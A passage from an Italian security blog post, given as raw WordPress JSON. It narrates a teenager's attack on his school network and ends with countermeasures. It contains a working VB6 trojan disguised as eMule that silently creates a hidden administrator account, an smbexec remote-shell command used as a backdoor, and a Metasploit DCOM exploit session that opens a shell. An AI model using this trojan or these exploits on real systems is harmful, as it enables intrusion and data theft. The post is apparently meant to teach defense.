style=\"font-size:18px\">Eseguire una copia di emule da una directory nascosta<\/li>\n<\/ul>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Utilizzando l&#8217;icona di emule in modo da rendere il tutto pi\u00f9 credibile, bastava a questo punto:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li style=\"font-size:18px\">Eseguire l&#8217;upload del <strong>Trojan<\/strong> appena creato nella directory di emule<\/li>\n\n\n\n<li style=\"font-size:18px\">Attendere l&#8217;esecuzione da parte dell&#8217;amministratore di sistema<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Emule si sarebbe cos\u00ec avviato senza problemi creando l&#8217;utente amministratore. <\/p>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Di seguito un esempio di backdoor scritto in vb6 per eseguire quanto descritto<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\"><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Private Sub Form_Load()<br>    Dim username As String<br>    Dim password As String<br>    Dim emulePath As String<br>    <br>    username = \"admin\"<br>    password = \"Password123\"<br>    <br>    Shell \"net user \" & username & \" \" & password & \" \/add\", vbHide<br>    <br>    Shell \"net localgroup Administrators \" & username & \" \/add\", vbHide<br>    <br>    emulePath = App.Path & \"\\emudir\\emule.exe\"<br>    <br>    Shell emulePath, vbNormalFocus<br>    <br>    Unload Me<br>End Sub<br><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\"><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Gli sforzi furono ripagati perch\u00e8 emule venne eseguito e l&#8217;utente admin venne creato come atteso<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"512\" height=\"174\" src=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/localgroup-add.jpg\" alt=\"\" class=\"wp-image-301\" srcset=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/localgroup-add.jpg 512w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/localgroup-add-300x102.jpg 300w\" sizes=\"auto, (max-width: 512px) 100vw, 512px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">In questo modo ottenne Natan ottenne anche una backdoor persistente, questo perch\u00e8 grazie ad un account amministratore \u00e8 possibile eseguire una shell remota in ogni momento tramite il tool smbexec<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/smbexec.py admin@192.168.178.63<\/code><\/pre>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"844\" height=\"215\" src=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/smbexec.jpg\" alt=\"\" class=\"wp-image-291\" srcset=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/smbexec.jpg 844w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/smbexec-300x76.jpg 300w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/smbexec-768x196.jpg 768w\" sizes=\"auto, (max-width: 844px) 100vw, 844px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">5 -\u2002<strong>Lateral movement o pivoting<\/strong><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Grazie ai privilegi di amministore Natan pot\u00e8 installare alcuni tool aggiuntivi e disabilitare l&#8217;antivirus, tool che servirono per effettuare scansioni all&#8217;interno della rete interna al fine di trovare altri obiettivi sensibili. L&#8217;insieme delle tecniche utilizzate per muoversi dall&#8217;obiettivo iniziale verso altri sistemi della rete interna prende il nome di <strong>Lateral Movement<\/strong>. Grazie a questa tecnica, gli hackers possono raggiungere dati sensibili e attaccare sistemi realmente critici.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">Dpt Office Attack  <\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Nell&#8217;estate del 2003 internet venne sconvolto dall&#8217;attacco di un worm molto aggressivo, il <strong>Blaster<\/strong>. Tale programma maligno era in grado di replicarsi automaticamente sfruttando una vulnerabilit\u00e0 del protocollo rpc di Micorsoft. I sistemi esposti direttamente su internet vennero patchati quasi subito, questo perch\u00e8 Blaster infettando il sistema lo rendeva quasi inutilizzabile, spesso gli utenti si trovarono infatti di fronte ad un minaccioso countdown che costringeva al riavvio<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"372\" height=\"340\" src=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/blasterrpc.jpg\" alt=\"\" class=\"wp-image-293\" srcset=\"https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/blasterrpc.jpg 372w, https:\/\/www.cyberdoomera.com\/wp-content\/uploads\/2024\/03\/blasterrpc-300x274.jpg 300w\" sizes=\"auto, (max-width: 372px) 100vw, 372px\" \/><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Sebbene i sistemi esterni vennero prontamente patchati, lo stesso non si pot\u00e8 dire per i sistemi non direttamente esposti sulla rete e quindi non direttamente raggiungibili dal worm. Questo lasci\u00f2 un numero imprecisato di macchine potenzialmente attaccabili all&#8217;iterno delle reti LAN di tutto il mondo, macchine che spesso detenevano dati assai pi\u00f9 sensibili rispetto ai webserver patchati ed esposti sulla rete.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">Dcom exploit<\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Natan inizi\u00f2 a scansionare la rete interna della fakeschool e concentr\u00f2 i suoi sforzi contro una macchina con hostname <strong>dptoffice<\/strong>, in quanto ritenne di poter trovare molte informazioni preziose in merito agli altri studenti. Sapeva di poter provare ad utilizzare il dcom exploit, lo stesso utilizzato dal worm blaster, in quanto il dtpoffice era un windows 2000 non esposto sulla rete. Per replicare la stessa tipologia di attacco utilizzeremo il metasploit framework tramite exploit dcom<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>msf6 exploit(windows\/dcerpc\/ms03_026_dcom) > set RHOST 192.168.178.81<br>RHOST => 192.168.178.81<br>msf6 exploit(windows\/dcerpc\/ms03_026_dcom) > exploit<br><br>&#91;*] 192.168.178.81:135 - Trying target Windows NT SP3-6a\/2000\/XP\/2003 Universal...<br>&#91;*] 192.168.178.81:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.178.81&#91;135] ...<br>&#91;*] 192.168.178.81:135 - Calling DCOM RPC with payload (1648 bytes) ...<br>&#91;*] Started bind TCP handler against 192.168.178.81:4444<br>&#91;*] Sending stage (240 bytes) to 192.168.178.81<br>&#91;*] Command shell session 1 opened (192.168.178.51:34587 -> 192.168.178.81:4444) at 2024-03-03 01:48:45 +0100<br><br><br>Shell Banner:<br>Microsoft Windows 2000 &#91;Versione 5.00.2195]<br>-----<br>          <br><br>C:\\WINNT\\system32><br><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Una volta ottenuto l&#8217;accesso sulla macchina, Natan riusc\u00ec ad estrapolare molte informazioni utili tra cui un database in access con tutti i numeri telefonici dei dipendenti scolastici.<\/p>\n\n\n\n<div style=\"height:60px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">Contromisure<\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Ci avviciniamo alla fine di questo articolo e come di consueto evidenziamo le contromisure per mitigare gli attacchi sopra esposti:<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li style=\"font-size:18px\"><strong>Mai esporre servizi non necessari sulla rete<\/strong>: per un webserver \u00e8 impossibile fare a meno del servizio HTTP e spesso anche di FTP. Che dire per\u00f2 del servizio Netbios o RPC? E&#8217; importante disabilitare i servizi non necessari per restringere la superficie di attacco;<\/li>\n\n\n\n<li style=\"font-size:18px\"><strong>Utilizzare una password policy robusta<\/strong>: utilizzare password deboli o peggio ancora utilizzare password uguali all&#8217;username \u00e8 una grave vulnerabilit\u00e0. E&#8217; necessario impostare una password policy efficace;<\/li>\n\n\n\n<li style=\"font-size:18px\"><strong>Utilizzare una gestione efficace dei permessi<\/strong>: un utente normale non dovrebbe poter scrivere in una directory dove sono presenti programmi utilizzati da amministratori di sistema;<\/li>\n\n\n\n<li style=\"font-size:18px\"><strong>Installare le patch di sistema non appena disponibili<\/strong>: ogni giorno vengono scoperte nuove vulnerabilit\u00e0, un sistema obsoleto \u00e8 un sistema vulnerabile se non si installano i dovuti aggiornamenti e patch.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<div style=\"height:60px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">Considerazioni finali<\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\">Questa storia, sebbene tratti di attacchi vecchi su tecnologie obsolete, ci insegna alcune cose molto importanti:<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li style=\"font-size:18px\"><strong>Mai trascurare i dettagli<\/strong>: per svolgere il lavoro del sysadmin in modo efficace, spesso bisogna essere paranoici. Ogni dettaglio che per noi sembra irrilevante, per un attaccante pu\u00f2 essere una vera miniera d&#8217;oro. Spesso si tende a trascurare la sicurezza di un sistema perch\u00e8 lo si ritiene poco importante, non pensando a quanti dati passano da quel sistema e a quanti sistemi posso accedere da esso. Per un attaccante nessun sistema \u00e8 inutile, ogni dato \u00e8 importante;<\/li>\n\n\n\n<li style=\"font-size:18px\"><strong>Il sistema \u00e8 forte tanto quanto lo \u00e8 il suo anello pi\u00f9 debole<\/strong>: \u00e8 bastata una semplice password debole per compromettere un intero sistema e la sua rete, basta solo un accesso per ottenere un effetto valanga.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<div style=\"height:47px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">Link utili<\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><\/h4>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:18px\"><\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li style=\"font-size:18px\"><a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/137-138-139-pentesting-netbios\" title=\"Nebios enumeration\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/137-138-139-pentesting-netbios<\/a><\/li>\n\n\n\n<li style=\"font-size:18px\"><a href=\"https:\/\/www.metasploit.com\/\" title=\"metasploit\">https:\/\/www.metasploit.com\/<\/a><\/li>\n\n\n\n<li style=\"font-size:18px\"><a href=\"https:\/\/en.wikipedia.org\/wiki\/Blaster_(computer_worm)\" title=\"Worm blaster\">https:\/\/en.wikipedia.org\/wiki\/Blaster_(computer_worm)<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Prima di iniziare a scrivere questo post \u00e8 doveroso fare qualche premessa: Background ed environment Questa storia \u00e8 ambientata nell&#8217;Irlanda dei primi anni 2000, il nostro protagonista Natan-k \u00e8 uno studente adolescente. Come molti ragazzi, anche Natan ha qualche &#8220;problemino&#8221; con i suoi professori ed in generale con le autorit\u00e0, nel contempo per\u00f2 ha dalla [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":305,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"categories":[19],"tags":[22,13,20,11,23,12,21],"class_list":["post-238","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hacking","tag-backdoor","tag-bruteforce","tag-exploit","tag-hacking","tag-prvilege-escalation","tag-security","tag-trojan"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.cyberdoomera.com\/en\/wp-json\/wp\/v2\/posts\/238","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.cyberdoomera.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.cyberdoomera.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.cyberdoomera.com\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.cyberdoomera.com\/en\/wp-json\/wp\/v2\/comments?post=238"}],"version-history":[{"count":98,"href":"https:\/\/www.cyberdoomera.com\/en\/wp-json\/wp\/v2\/posts\/238\/revisions"}],"predecessor-version":[{"id":353,"href":"https:\/\/www.cyberdoomera.com\/en\/wp-json\/wp\/v2\/posts\/238\/revisions\/353"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.cyberdoomera.com\/en\/wp-json\/wp\/v2\/media\/305"}],"wp:attachment":[{"href":"https:\/\/www.cyberdoomera.com\/en\/wp-json\/wp\/v2\/media?parent=238"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.cyberdoomera.com\/en\/wp-json\/wp\/v2\/categories?post=238"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.cyberdoomera.com\/en\/wp-json\/wp\/v2\/tags?post=238"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}